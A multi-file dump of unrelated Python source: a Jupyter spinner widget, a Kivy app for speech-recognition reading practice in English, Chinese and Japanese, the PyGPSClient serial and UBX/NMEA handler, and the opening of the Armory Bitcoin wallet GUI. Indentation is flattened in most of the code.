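    file_id = '0B_EXAMPLE_FILE_ID'  # assumption: any shareable Drive file id
    # Streams the file in 32 KiB chunks, handling the confirm-token redirect.
    download_file_from_google_drive(file_id, '/tmp/example_download.bin')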
class HaloNotebook(Halo):
CLEAR_LINE = '\033[K'
def __init__(self, text='', color='cyan', spinner=None, animation=None, interval=-1, enabled=True, stream=None):
super(HaloNotebook, self).__init__(text, color, spinner, animation, interval, enabled, stream)
self.output = self._make_output_widget()
def _make_output_widget(self):
return Output()
# TODO: use a property and a setter instead of this helper
def _output(self, text=''):
return ({'name': 'stdout', 'output_type': 'stream', 'text': text},)
def clear(self):
if not self._enabled:
return self
with self.output:
self.output.outputs += self._output('\r')
self.output.outputs += self._output(self.CLEAR_LINE)
self.output.outputs = self._output()
return self
def _render_frame(self):
frame = self.frame()
output = '\r{0}'.format(frame)
with self.output:
self.output.outputs += self._output(output)
def start(self, text=None):
if text is not None:
self._text = self._get_text(text, animation=None)
if not self._enabled or self._spinner_id is not None:
return self
if self._stream.isatty():
cursor.hide()
self.output = self._make_output_widget()
display(self.output)
self._stop_spinner = threading.Event()
self._spinner_thread = threading.Thread(target=self.render)
self._spinner_thread.setDaemon(True)
self._render_frame()
self._spinner_id = self._spinner_thread.name
self._spinner_thread.start()
return self
def stop_and_persist(self, options=None):
    # Avoid a shared mutable default argument; treat None as "no options".
    if options is None:
        options = {}
    if not isinstance(options, dict):
        raise TypeError('Options passed must be a dictionary')
if 'symbol' in options and options['symbol'] is not None:
symbol = decode_utf_8_text(options['symbol'])
else:
symbol = ' '
if 'text' in options and options['text'] is not None:
text = decode_utf_8_text(options['text'])
else:
text = self._text['original']
text = text.strip()
self.stop()
output = '\r{0} {1}\n'.format(symbol, text)
with self.output:
self.output.outputs = self._output(output)
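# Hedged usage sketch for HaloNotebook above, intended for a Jupyter cell. The
# spinner text and status symbols are illustrative; stop_and_persist() expects
# the options dict shown in its implementation.
def example_notebook_spinner():
    """Show a spinner while downloading, then persist a final status line."""
    spinner = HaloNotebook(text='Downloading from Drive...')
    spinner.start()
    try:
        download_file_from_google_drive('0B_EXAMPLE_FILE_ID', '/tmp/example_download.bin')
        spinner.stop_and_persist({'symbol': '✔', 'text': 'Download complete'})
    except Exception as err:
        spinner.stop_and_persist({'symbol': '✖', 'text': 'Download failed: {}'.format(err)})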
|
frontEnd.py
|
from __future__ import division
from random import random
from kivy.app import App
from kivy.lang import Builder
from kivy.uix.screenmanager import ScreenManager, Screen, FadeTransition
from kivy.uix.widget import Widget
from kivy.graphics import Line, Color, Ellipse
from kivy.uix.boxlayout import BoxLayout
from kivy.properties import StringProperty
import threading
import passages
import queue
from google.cloud import speech
from google.cloud.speech import enums
from google.cloud.speech import types
from google.cloud import texttospeech
from googlestreaming import MicrophoneStream
import requests
from PassageReader import match, generatePronun, passageCheck, getWord, initializeStream
from ForeignPassageReader import generatePronun as fgeneratePronun, passageCheck as fpassageCheck, getWord as fgetWord
RATE = 16000
CHUNK = int(RATE / 10) # 100ms
class Painter(Widget):
def on_touch_down(self, touch):
color = (random(), 1.,1.) #reduce number of possible colors
with self.canvas:
Color(*color, mode='hsv') #sets the colors to be equally bright
d = 30.
Ellipse(pos=(touch.x - d / 2,touch.y - d / 2), size=(d,d))
touch.ud["line"] = Line(points=(touch.x, touch.y))
def on_touch_move(self, touch):
touch.ud["line"].points += [touch.x, touch.y]
class MainScreen(Screen):
pass
class EnglishScreen(Screen):
passage_label = StringProperty()
input_label = StringProperty()
help_label = StringProperty()
streamthread = threading.Thread
def startReading(self):
target = self.passage_label
output = []
self.streamthread = threading.Thread(target=(lambda p, q: q.append(self.startStream())), args=(self, output), kwargs={})
self.streamthread.start()
thr = threading.Thread(target=self.streamListener)
def streamListener(self):
while self.streamthread.is_alive():
pass
def startStream(self):
def read(responses, passage):
missed = []
passage_index = 0
self.passage_label = str(".\n".join(passage[passage_index:])+".")
for response in responses:
if not response.results:
continue
result = response.results[0]
if not result.alternatives:
continue
if result.is_final:
print(result.alternatives[0].transcript)
print(passageCheck(passage[passage_index], result.alternatives[0].transcript))
comp_result = passageCheck(passage[passage_index], result.alternatives[0].transcript)
missed += comp_result[0]
if not comp_result[1]:
passage_index += 1
else:
passage[passage_index] = " ".join(comp_result[1])
generatePronun(comp_result[1][0])
missed += comp_result[1][0]
self.help_label = str("Tip: "+ " ".join(getWord(comp_result[1][0]))) # call dictionary lookup
self.input_label = result.alternatives[0].transcript
if passage_index<len(passage):
self.passage_label = str(".\n".join(passage[passage_index:]) + ".")
if passage_index == len(passage):
self.passage_label = str("")
return missed
language_code = 'en-US' # a BCP-47 language tag
client = speech.SpeechClient()
config = types.RecognitionConfig(
encoding=enums.RecognitionConfig.AudioEncoding.LINEAR16,
sample_rate_hertz=RATE,
language_code=language_code)
streaming_config = types.StreamingRecognitionConfig(
config=config,
interim_results=True)
with MicrophoneStream(RATE, CHUNK) as stream:
audio_generator = stream.generator()
requests = (types.StreamingRecognizeRequest(audio_content=content)
for content in audio_generator)
responses = client.streaming_recognize(streaming_config, requests)
# Now, put the transcription responses to use.
finals = read(responses, passages.english)
return (finals)
class ChineseScreen(Screen):
passage_label = StringProperty()
help_label = StringProperty()
input_label = StringProperty()
streamthread = threading.Thread
def startReading(self):
target = self.passage_label
output = []
self.streamthread = threading.Thread(target=(lambda p, q: q.append(self.startStream())), args=(self, output),
kwargs={})
self.streamthread.start()
thr = threading.Thread(target=self.streamListener)
def streamListener(self):
while self.streamthread.is_alive():
pass
def startStream(self):
def read(responses, passage, lang):
missed = []
passage_index = 0
transcript_index = 0
self.passage_label = str(".\n".join(passage[passage_index:])+".")
for response in responses:
# print(response.results[0])
if not response.results:
continue
result = response.results[0]
if not result.alternatives:
continue
if result.stability >= 0.80:
print(result.alternatives[0].transcript[transcript_index:])
transcript = result.alternatives[0].transcript
print(transcript_index)
print(passageCheck(passage[passage_index], transcript[transcript_index:]))
comp_result = passageCheck(passage[passage_index], transcript[transcript_index:])
if not comp_result[1]:
passage_index += 1
else:
passage[passage_index] = "".join(comp_result[1])
fgeneratePronun(comp_result[1][0], lang)
self.help_label = str("Tip: "+ " ".join(fgetWord(comp_result[1][0], lang))) # call dictionary lookup # call dictionary lookup
self.input_label = result.alternatives[0].transcript[transcript_index:]
transcript_index = len(transcript)
if passage_index<len(passage):
self.passage_label = str(".\n".join(passage[passage_index:]) + ".")
if passage_index == len(passage):
self.passage_label = str("")
return missed
language_code = 'zh' # a BCP-47 language tag 'zh' 'ja-JP'
passage = passages.chinese
passageIndex = 0
client = speech.SpeechClient()
config = types.RecognitionConfig(
encoding=enums.RecognitionConfig.AudioEncoding.LINEAR16,
sample_rate_hertz=RATE,
language_code=language_code)
streaming_config = types.StreamingRecognitionConfig(
config=config,
interim_results=True)
with MicrophoneStream(RATE, CHUNK) as stream:
audio_generator = stream.generator()
requests = (types.StreamingRecognizeRequest(audio_content=content)
for content in audio_generator)
responses = client.streaming_recognize(streaming_config, requests)
# Now, put the transcription responses to use.
finals = read(responses, passage, 'zh')
return finals
class JapaneseScreen(Screen):
passage_label = StringProperty()
help_label = StringProperty()
input_label = StringProperty()
streamthread = threading.Thread
def startReading(self):
target = self.passage_label
output = []
self.streamthread = threading.Thread(target=(lambda p, q: q.append(self.startStream())), args=(self, output),
kwargs={})
self.streamthread.start()
thr = threading.Thread(target=self.streamListener)
def streamListener(self):
while self.streamthread.is_alive():
pass
def startStream(self):
def read(responses, passage, lang):
missed = []
passage_index = 0
transcript_index = 0
self.passage_label = str(".\n".join(passage[passage_index:]) + ".")
for response in responses:
# print(response.results[0])
if not response.results:
continue
result = response.results[0]
if not result.alternatives:
continue
if result.stability >= 0.80:
print(result.alternatives[0].transcript[transcript_index:])
transcript = result.alternatives[0].transcript
print(transcript_index)
print(passageCheck(passage[passage_index], transcript[transcript_index:]))
comp_result = passageCheck(passage[passage_index], transcript[transcript_index:])
if not comp_result[1]:
passage_index += 1
else:
passage[passage_index] = "".join(comp_result[1])
fgeneratePronun(comp_result[1][0], lang)
self.help_label = str("Tip: " + " ".join(
fgetWord(comp_result[1][0], lang)))  # call dictionary lookup
self.input_label = result.alternatives[0].transcript[transcript_index:]
transcript_index = len(transcript)
if passage_index < len(passage):
self.passage_label = str(".\n".join(passage[passage_index:]) + ".")
if passage_index == len(passage):
self.passage_label = str("")
return missed
language_code = 'ja-JP' # a BCP-47 language tag 'zh' 'ja-JP'
passage = passages.japanese
passageIndex = 0
client = speech.SpeechClient()
config = types.RecognitionConfig(
encoding=enums.RecognitionConfig.AudioEncoding.LINEAR16,
sample_rate_hertz=RATE,
language_code=language_code)
streaming_config = types.StreamingRecognitionConfig(
config=config,
interim_results=True)
with MicrophoneStream(RATE, CHUNK) as stream:
audio_generator = stream.generator()
requests = (types.StreamingRecognizeRequest(audio_content=content)
for content in audio_generator)
responses = client.streaming_recognize(streaming_config, requests)
# Now, put the transcription responses to use.
finals = read(responses, passage, 'ja')
return finals
class SummaryScreen(Screen):
pass
class ScreenManagement(ScreenManager):
pass
with open("floating.kv", encoding="utf-8") as f:
presentation = Builder.load_string(f.read()) #load the kivy file
class SimpleKivy7(App):
def build(self):
return presentation
if __name__== "__main__":
SimpleKivy7().run()
|
serial_handler.py
|
"""
SerialHandler class for PyGPSClient application
This handles all the serial i/o, the threaded read process and routing to
the appropriate protocol handler
Created on 16 Sep 2020
:author: semuadmin
:copyright: SEMU Consulting © 2020
:license: BSD 3-Clause
"""
from io import BufferedReader
from threading import Thread
from serial import Serial, SerialException, SerialTimeoutException
import pyubx2.ubxtypes_core as ubt
from .globals import (
CONNECTED,
CONNECTED_FILE,
DISCONNECTED,
NMEA_PROTOCOL,
MIXED_PROTOCOL,
UBX_PROTOCOL,
)
from .strings import STOPDATA, NOTCONN, SEROPENERROR, ENDOFFILE
class SerialHandler:
"""
Serial handler class.
"""
def __init__(self, app):
"""
Constructor.
:param Frame app: reference to main tkinter application
"""
self.__app = app # Reference to main application class
self.__master = self.__app.get_master() # Reference to root class (Tk)
self._serial_object = None
self._serial_buffer = None
self._serial_thread = None
self._file_thread = None
self._connected = False
self._reading = False
def __del__(self):
"""
Destructor.
"""
if self._serial_thread is not None:
self._reading = False
self._serial_thread = None
self.disconnect()
def connect(self):
"""
Open serial connection.
"""
serial_settings = self.__app.frm_settings.serial_settings()
try:
self._serial_object = Serial(
serial_settings.port,
serial_settings.bpsrate,
bytesize=serial_settings.databits,
stopbits=serial_settings.stopbits,
parity=serial_settings.parity,
xonxoff=serial_settings.xonxoff,
rtscts=serial_settings.rtscts,
timeout=serial_settings.timeout,
)
self._serial_buffer = BufferedReader(self._serial_object)
self.__app.frm_banner.update_conn_status(CONNECTED)
self.__app.set_connection(
(
f"{serial_settings.port}:{serial_settings.port_desc} "
+ f"@ {str(serial_settings.bpsrate)}"
),
"green",
)
self.__app.frm_settings.enable_controls(CONNECTED)
self._connected = True
self.start_read_thread()
if self.__app.frm_settings.datalogging:
self.__app.file_handler.open_logfile_output()
if self.__app.frm_settings.record_track:
self.__app.file_handler.open_trackfile()
except (IOError, SerialException, SerialTimeoutException) as err:
self._connected = False
self.__app.set_connection(
(
f"{serial_settings.port}:{serial_settings.port_desc} "
+ f"@ {str(serial_settings.baudrate)}"
),
"red",
)
self.__app.set_status(SEROPENERROR.format(err), "red")
self.__app.frm_banner.update_conn_status(DISCONNECTED)
self.__app.frm_settings.enable_controls(DISCONNECTED)
def connect_file(self):
"""
Open binary data file connection.
"""
logpath = self.__app.frm_settings.logpath
try:
self._serial_object = open(logpath, "rb")
self._serial_buffer = BufferedReader(self._serial_object)
self.__app.frm_banner.update_conn_status(CONNECTED_FILE)
self.__app.set_connection(f"{logpath}", "blue")
self.__app.frm_settings.enable_controls(CONNECTED_FILE)
self._connected = True
self.start_readfile_thread()
if self.__app.frm_settings.record_track:
self.__app.file_handler.open_trackfile()
except (IOError, SerialException, SerialTimeoutException) as err:
self._connected = False
self.__app.set_connection(f"{logpath}", "red")
self.__app.set_status(SEROPENERROR.format(err), "red")
self.__app.frm_banner.update_conn_status(DISCONNECTED)
self.__app.frm_settings.enable_controls(DISCONNECTED)
def disconnect(self):
"""
Close serial connection.
"""
if self._connected:
try:
self._reading = False
self._serial_object.close()
self.__app.frm_banner.update_conn_status(DISCONNECTED)
self.__app.set_connection(NOTCONN, "red")
self.__app.set_status("", "blue")
if self.__app.frm_settings.datalogging:
self.__app.file_handler.close_logfile()
if self.__app.frm_settings.record_track:
self.__app.file_handler.close_trackfile()
except (SerialException, SerialTimeoutException):
pass
self._connected = False
self.__app.frm_settings.enable_controls(self._connected)
@property
def port(self):
"""
Getter for port
"""
return self.__app.frm_settings.serial_settings().port
@property
def connected(self):
"""
Getter for connection status
"""
return self._connected
@property
def serial(self):
"""
Getter for serial object
"""
return self._serial_object
@property
def buffer(self):
"""
Getter for serial buffer
"""
return self._serial_buffer
@property
def thread(self):
"""
Getter for serial thread
"""
return self._serial_thread
def serial_write(self, data: bytes):
"""
Write binary data to serial port.
:param bytes data: data to write to stream
"""
try:
self._serial_object.write(data)
except (SerialException, SerialTimeoutException) as err:
print(f"Error writing to serial port {err}")
def start_read_thread(self):
"""
Start the serial reader thread.
"""
if self._connected:
self._reading = True
self.__app.frm_mapview.reset_map_refresh()
self._serial_thread = Thread(target=self._read_thread, daemon=True)
self._serial_thread.start()
def start_readfile_thread(self):
"""
Start the file reader thread.
"""
if self._connected:
self._reading = True
self.__app.frm_mapview.reset_map_refresh()
self._file_thread = Thread(target=self._readfile_thread, daemon=True)
self._file_thread.start()
def stop_read_thread(self):
"""
Stop serial reader thread.
"""
if self._serial_thread is not None:
self._reading = False
self._serial_thread = None
self.__app.set_status(STOPDATA, "red")
def stop_readfile_thread(self):
"""
Stop file reader thread.
"""
if self._file_thread is not None:
self._reading = False
self._file_thread = None
self.__app.set_status(STOPDATA, "red")
def _read_thread(self):
"""
THREADED PROCESS
Reads binary data from serial port and generates virtual event to
trigger data parsing and widget updates.
"""
try:
# print(f"DEBUG doing serial_handler._read_thread")
while self._reading and self._serial_object:
# print(f"DEBUG doing serial_handler._read_thread while loop")
if self._serial_object.in_waiting:
# print(f"DEBUG Bytes in buffer: {self._serial_object.in_waiting}")
# print(f"DEBUG doing serial_handler._read_thread in_waiting")
self.__master.event_generate("<<ubx_read>>")
except SerialException as err:
self.__app.set_status(f"Error in read thread {err}", "red")
# spurious errors as thread shuts down after serial disconnection
except (TypeError, OSError):
pass
def _readfile_thread(self):
"""
THREADED PROCESS
Reads binary data from datalog file and generates virtual event to
trigger data parsing and widget updates.
"""
# print(f"DEBUG doing serial_handler._readfile_thread")
while self._reading and self._serial_object:
# print(f"DEBUG doing serial_handler._readfile_thread while loop")
self.__master.event_generate("<<ubx_readfile>>")
def on_read(self, event): # pylint: disable=unused-argument
"""
Action on <<ubx_read>> event - read any data in the buffer.
:param event event: read event
"""
# print(f"DEBUG doing serial_handler.on_read")
if self._reading and self._serial_object is not None:
try:
self._parse_data(self._serial_buffer)
except SerialException as err:
self.__app.set_status(f"Error {err}", "red")
def on_eof(self, event): # pylint: disable=unused-argument
"""
Action on end of file
:param event event: eof event
"""
# print(f"DEBUG doing serial_handler.on_eof")
self.disconnect()
self.__app.set_status(ENDOFFILE, "blue")
def _parse_data(self, ser: Serial):
"""
Read the binary data and direct to the appropriate
UBX and/or NMEA protocol handler, depending on which protocols
are filtered.
:param Serial ser: serial port
"""
# print(f"DEBUG doing serial_handler_parse_data")
parsing = True
raw_data = None
byte1 = ser.read(1) # read first byte to determine protocol
if len(byte1) < 1:
self.__master.event_generate("<<ubx_eof>>")
return
while parsing:
filt = self.__app.frm_settings.protocol
byte2 = ser.read(1)
if len(byte2) < 1:
self.__master.event_generate("<<ubx_eof>>")
return
# if it's a UBX message (b'\xb5\x62')
if byte1 == b"\xb5" and byte2 == b"\x62":
# print(f"DEBUG doing ubx serial_handler._parse_data if ubx {ser.peek()}")
byten = ser.read(4)
# print(f"DEBUG first byten = {byten}, len = {len(byten)}, need 4")
if len(byten) < 4:
self.__master.event_generate("<<ubx_eof>>")
parsing = False
break
clsid = byten[0:1]
msgid = byten[1:2]
lenb = byten[2:4]
leni = int.from_bytes(lenb, "little", signed=False)
byten = ser.read(leni + 2)
# print(f"DEBUG second byten = {byten}, len = {len(byten)}, need {leni +2 }")
if len(byten) < leni + 2:
self.__master.event_generate("<<ubx_eof>>")
parsing = False
break
plb = byten[0:leni]
cksum = byten[leni : leni + 2]
raw_data = ubt.UBX_HDR + clsid + msgid + lenb + plb + cksum
if filt in (UBX_PROTOCOL, MIXED_PROTOCOL):
self.__app.ubx_handler.process_data(raw_data)
parsing = False
# if it's an NMEA message ('$G' or '$P')
elif byte1 == b"\x24" and byte2 in (b"\x47", b"\x50"):
# print(f"DEBUG doing nmea serial_handler._parse_data if nmea {ser.peek()}")
raw_data = byte1 + byte2 + ser.readline()
if filt in (NMEA_PROTOCOL, MIXED_PROTOCOL):
self.__app.nmea_handler.process_data(raw_data)
parsing = False
# else drop it like it's hot
else:
# print(f"DEBUG dropping {ser.peek()}")
parsing = False
# if datalogging, write to log file
if self.__app.frm_settings.datalogging and raw_data is not None:
self.__app.file_handler.write_logfile(raw_data)
def flush(self):
"""
Flush input buffer
"""
if self._serial_buffer is not None:
self._serial_buffer.flush()
if self._serial_object is not None:
self._serial_object.flushInput()
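# Standalone sketch of the UBX framing handled in _parse_data() above: sync bytes
# 0xB5 0x62, then class, id, a 2-byte little-endian payload length, the payload
# and a 2-byte checksum. The Fletcher-8 checksum routine is standard UBX practice
# and is an addition here, not taken from the handler itself.
def split_ubx_frame(frame: bytes):
    """Split one raw UBX frame into (class, id, payload), or return None."""
    if len(frame) < 8 or frame[0:2] != b"\xb5\x62":
        return None  # missing or wrong sync bytes
    clsid, msgid = frame[2:3], frame[3:4]
    leni = int.from_bytes(frame[4:6], "little", signed=False)
    if len(frame) < 6 + leni + 2:
        return None  # truncated frame
    payload = frame[6:6 + leni]
    ck_a = ck_b = 0
    for byt in frame[2:6 + leni]:  # checksum covers class, id, length, payload
        ck_a = (ck_a + byt) & 0xFF
        ck_b = (ck_b + ck_a) & 0xFF
    if bytes([ck_a, ck_b]) != frame[6 + leni:6 + leni + 2]:
        return None  # checksum mismatch
    return clsid, msgid, payload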
|
ArmoryQt.py
|
#! /usr/bin/python
# -*- coding: UTF-8 -*-
##############################################################################
# #
# Copyright (C) 2011-2015, Armory Technologies, Inc. #
# Distributed under the GNU Affero General Public License (AGPL v3) #
# See LICENSE or http://www.gnu.org/licenses/agpl.html #
# #
# Copyright (C) 2016-17, goatpig #
# Distributed under the MIT license #
# See LICENSE-MIT or https://opensource.org/licenses/MIT #
# #
##############################################################################
import gettext
from copy import deepcopy
from datetime import datetime
import hashlib
import logging
import math
import os
import platform
import random
import shutil
import signal
import socket
import subprocess
import sys
import threading
import time
import traceback
import glob
from PyQt4.QtCore import *
from PyQt4.QtGui import *
import psutil
import CppBlockUtils as Cpp
from armorycolors import Colors, htmlColor, QAPP
from armoryengine.ALL import *
from armoryengine.Block import PyBlock
from armoryengine.Decorators import RemoveRepeatingExtensions
from armoryengine.PyBtcWalletRecovery import WalletConsistencyCheck
from SDM import SatoshiDaemonManager
from ui.QtExecuteSignal import QtExecuteSignal
# Setup translations
translator = QTranslator(QAPP)
app_dir = "./"
try:
app_dir = os.path.dirname(os.path.realpath(__file__))
except:
if OS_WINDOWS and getattr(sys, 'frozen', False):
app_dir = os.path.dirname(sys.executable)
translator.load(GUI_LANGUAGE, os.path.join(app_dir, "lang/"))
QAPP.installTranslator(translator)
from armorymodels import *
from jasvet import verifySignature
import qrc_img_resources
from qtdefines import *
from qtdialogs import *
from ui.MultiSigDialogs import DlgSelectMultiSigOption, DlgLockboxManager, \
DlgMergePromNotes, DlgCreatePromNote, DlgImportAsciiBlock
from ui.Wizards import WalletWizard, TxWizard
from ui.toolsDialogs import MessageSigningVerificationDialog
from dynamicImport import MODULE_PATH_KEY, ZIP_EXTENSION, getModuleList, importModule,\
verifyZipSignature, MODULE_ZIP_STATUS, INNER_ZIP_FILENAME,\
MODULE_ZIP_STATUS_KEY, getModuleListNoZip, dynamicImportNoZip
import tempfile
# Set URL handler to warn before opening url
handler = URLHandler()
QDesktopServices.setUrlHandler("http", handler.handleURL)
QDesktopServices.setUrlHandler("https", handler.handleURL)
# Load our framework with OS X-specific code.
if OS_MACOSX:
import ArmoryMac
# HACK ALERT: Qt has a bug in OS X where the system font settings will override
# the app's settings when a window is activated (e.g., Armory starts, the user
# switches to another app, and then switches back to Armory). There is a
# workaround, as used by TeXstudio and other programs.
# https://bugreports.qt-project.org/browse/QTBUG-5469 - Bug discussion.
# http://sourceforge.net/p/texstudio/bugs/594/?page=1 - Fix is mentioned.
# http://pyqt.sourceforge.net/Docs/PyQt4/qapplication.html#setDesktopSettingsAware
# - Mentions that this must be called before the app (QAPP) is created.
QApplication.setDesktopSettingsAware(False)
if OS_WINDOWS:
from _winreg import *
MODULES_ZIP_DIR_NAME = 'modules'
class ArmoryMainWindow(QMainWindow):
""" The primary Armory window """
#############################################################################
def __init__(self, parent=None, splashScreen=None):
super(ArmoryMainWindow, self).__init__(parent)
self.isShuttingDown = False
# Load the settings file
self.settingsPath = CLI_OPTIONS.settingsPath
self.settings = SettingsFile(self.settingsPath)
# SETUP THE WINDOWS DECORATIONS
self.lblLogoIcon = QLabel()
if USE_TESTNET:
self.setWindowTitle('Armory - Bitcoin Wallet Management [TESTNET] dlgMain')
self.iconfile = ':/armory_icon_green_32x32.png'
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_green_h56.png'))
if Colors.isDarkBkgd:
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_white_text_green_h56.png'))
elif USE_REGTEST:
self.setWindowTitle('Armory - Bitcoin Wallet Management [REGTEST] dlgMain')
self.iconfile = ':/armory_icon_green_32x32.png'
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_green_h56.png'))
if Colors.isDarkBkgd:
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_white_text_green_h56.png'))
else:
self.setWindowTitle('Armory - Bitcoin Wallet Management')
self.iconfile = ':/armory_icon_32x32.png'
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_h44.png'))
if Colors.isDarkBkgd:
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_white_text_h56.png'))
# OS X requires some Objective-C code if we're switching to the testnet
# (green) icon. We should also use a larger icon. Otherwise, Info.plist
# takes care of everything.
if not OS_MACOSX:
self.setWindowIcon(QIcon(self.iconfile))
else:
if USE_TESTNET or USE_REGTEST:
self.iconfile = ':/armory_icon_green_fullres.png'
ArmoryMac.MacDockIconHandler.instance().setMainWindow(self)
ArmoryMac.MacDockIconHandler.instance().setIcon(QIcon(self.iconfile))
self.lblLogoIcon.setAlignment(Qt.AlignHCenter | Qt.AlignVCenter)
self.netMode = NETWORKMODE.Offline
self.abortLoad = False
self.memPoolInit = False
self.needUpdateAfterScan = True
self.sweepAfterScanList = []
self.newWalletList = []
self.newZeroConfSinceLastUpdate = []
self.lastSDMStr = ""
self.doShutdown = False
self.downloadDict = {}
self.notAvailErrorCount = 0
self.satoshiVerWarnAlready = False
self.satoshiLatestVer = None
self.latestVer = {}
self.downloadDict = {}
self.satoshiHomePath = None
self.satoshiExeSearchPath = None
self.initSyncCircBuff = []
self.latestVer = {}
self.lastVersionsTxtHash = ''
self.dlgCptWlt = None
self.wasSynchronizing = False
self.entropyAccum = []
self.allLockboxes = []
self.lockboxIDMap = {}
self.cppLockboxWltMap = {}
self.broadcasting = {}
self.nodeStatus = None
self.numHeartBeat = 0
# Error and exit on both regtest and testnet
if USE_TESTNET and USE_REGTEST:
DlgRegAndTest(self, self).exec_()
# Full list of notifications, and notify IDs that should trigger popups
# when sending or receiving.
self.changelog = []
self.downloadLinks = {}
self.almostFullNotificationList = {}
self.notifyOnSend = set()
self.notifyonRecv = set()
self.versionNotification = {}
self.notifyIgnoreLong = []
self.notifyIgnoreShort = []
self.maxPriorityID = None
self.satoshiVersions = ['',''] # [curr, avail]
self.armoryVersions = [getVersionString(BTCARMORY_VERSION), '']
self.tempModulesDirName = None
self.internetStatus = None
self.lockboxLedgModel = None
#delayed URI parsing dict
self.delayedURIData = {}
self.delayedURIData['qLen'] = 0
#Setup the signal to spawn progress dialogs from the main thread
self.connect(self, SIGNAL('initTrigger') , self.initTrigger)
self.connect(self, SIGNAL('execTrigger'), self.execTrigger)
self.connect(self, SIGNAL('checkForNegImports'), self.checkForNegImports)
'''
With Qt, all GUI operations need to happen in the main thread. If
the GUI operation is triggered from another thread, it needs to
emit a Qt signal, so that Qt can schedule the operation in the main
thread. QtExecuteSignal is a utility class that handles the signaling
and delaying/threading of execution
'''
self.signalExecution = QtExecuteSignal(self)
#push model BDM notify signal
def cppNotifySignal(action, arglist):
self.signalExecution.executeMethod(\
self.handleCppNotification, action, arglist)
TheBDM.registerCppNotification(cppNotifySignal)
# We want to determine whether the user just upgraded to a new version
self.firstLoadNewVersion = False
currVerStr = 'v'+getVersionString(BTCARMORY_VERSION)
if self.settings.hasSetting('LastVersionLoad'):
lastVerStr = self.settings.get('LastVersionLoad')
if not lastVerStr==currVerStr:
LOGINFO('First load of new version: %s', currVerStr)
self.firstLoadNewVersion = True
self.settings.set('LastVersionLoad', currVerStr)
# Because dynamically retrieving addresses for querying transaction
# comments can be so slow, I use this txAddrMap to cache the mappings
# between tx's and addresses relevant to our wallets. It really only
# matters for massive tx with hundreds of outputs -- but such tx do
# exist and this is needed to accommodate wallets with lots of them.
self.txAddrMap = {}
def updateProgress(val):
if splashScreen is not None:
splashScreen.updateProgress(val)
self.loadWalletsAndSettings(updateProgress)
eulaAgreed = self.getSettingOrSetDefault('Agreed_to_EULA', False)
if not eulaAgreed:
DlgEULA(self,self).exec_()
armoryengine.ArmoryUtils.DEFAULT_ADDR_TYPE = \
self.getSettingOrSetDefault('Default_ReceiveType', 'P2PKH')
if not self.abortLoad:
self.acquireProcessMutex()
# acquireProcessMutex may have set this flag if something went wrong
if self.abortLoad:
LOGWARN('Armory startup was aborted. Closing.')
os._exit(0)
# We need to query this once at the beginning, to avoid having
# strange behavior if the user changes the setting but hasn't
# restarted yet...
self.doAutoBitcoind = \
self.getSettingOrSetDefault('ManageSatoshi', not OS_MACOSX)
# This is a list of alerts that the user has chosen to no longer
# be notified about
alert_str = str(self.getSettingOrSetDefault('IgnoreAlerts', ""))
if alert_str == "":
alerts = []
else:
alerts = alert_str.split(",")
self.ignoreAlerts = {int(s):True for s in alerts}
# Setup system tray and register "bitcoin:" URLs with the OS
self.setupSystemTray()
self.setupUriRegistration()
self.heartbeatCount = 0
self.extraHeartbeatSpecial = []
self.extraHeartbeatAlways = []
self.extraHeartbeatOnline = []
self.extraNewTxFunctions = []
self.extraNewBlockFunctions = []
self.extraShutdownFunctions = []
self.extraGoOnlineFunctions = []
self.oneTimeScanAction = {}
self.walletDialogDict = {}
self.lblArmoryStatus = QRichLabel_AutoToolTip(self.tr('<font color=%1>Offline</font> ').arg(htmlColor('TextWarn')), doWrap=False)
self.statusBar().insertPermanentWidget(0, self.lblArmoryStatus)
# Table for all the wallets
self.walletModel = AllWalletsDispModel(self)
self.walletsView = QTableView(self)
w,h = tightSizeNChar(self.walletsView, 55)
viewWidth = 1.2*w
sectionSz = 1.3*h
viewHeight = 4.4*sectionSz
self.walletsView.setModel(self.walletModel)
self.walletsView.setSelectionBehavior(QTableView.SelectRows)
self.walletsView.setSelectionMode(QTableView.SingleSelection)
self.walletsView.verticalHeader().setDefaultSectionSize(sectionSz)
self.walletsView.setMinimumSize(viewWidth, viewHeight)
self.walletsView.setItemDelegate(AllWalletsCheckboxDelegate(self))
self.walletsView.horizontalHeader().setResizeMode(0, QHeaderView.Fixed)
self.walletsView.hideColumn(0)
if self.usermode == USERMODE.Standard:
initialColResize(self.walletsView, [20, 0, 0.35, 0.2, 0.2])
else:
initialColResize(self.walletsView, [20, 0.15, 0.30, 0.2, 0.20])
if self.settings.hasSetting('LastFilterState'):
if self.settings.get('LastFilterState')==4:
self.walletsView.showColumn(0)
self.connect(self.walletsView, SIGNAL('doubleClicked(QModelIndex)'),
self.execDlgWalletDetails)
self.connect(self.walletsView, SIGNAL('clicked(QModelIndex)'),
self.execClickRow)
self.walletsView.setColumnWidth(WLTVIEWCOLS.Visible, 20)
w,h = tightSizeNChar(GETFONT('var'), 100)
# Prepare for tableView slices (i.e. "Showing 1 to 100 of 382", etc)
self.numShowOpts = [100,250,500,1000,'All']
self.sortLedgOrder = Qt.AscendingOrder
self.sortLedgCol = 0
self.currLedgMin = 1
self.currLedgMax = 100
self.currLedgWidth = 100
btnAddWallet = QPushButton(self.tr("Create Wallet"))
btnImportWlt = QPushButton(self.tr("Import or Restore Wallet"))
self.connect(btnAddWallet, SIGNAL('clicked()'), self.startWalletWizard)
self.connect(btnImportWlt, SIGNAL('clicked()'), self.execImportWallet)
# Put the Wallet info into it's own little box
lblAvail = QLabel(self.tr("<b>Available Wallets:</b>"))
viewHeader = makeLayoutFrame(HORIZONTAL, [lblAvail, \
'Stretch', \
btnAddWallet, \
btnImportWlt, ])
wltFrame = QFrame()
wltFrame.setFrameStyle(QFrame.Box|QFrame.Sunken)
wltLayout = QGridLayout()
wltLayout.addWidget(viewHeader, 0,0, 1,3)
wltLayout.addWidget(self.walletsView, 1,0, 1,3)
wltFrame.setLayout(wltLayout)
# Make the bottom 2/3 a tabwidget
self.mainDisplayTabs = QTabWidget()
# Put the labels into scroll areas just in case window size is small.
self.tabDashboard = QWidget()
self.setupDashboard()
# Combo box to filter ledger display
self.comboWltSelect = QComboBox()
self.populateLedgerComboBox()
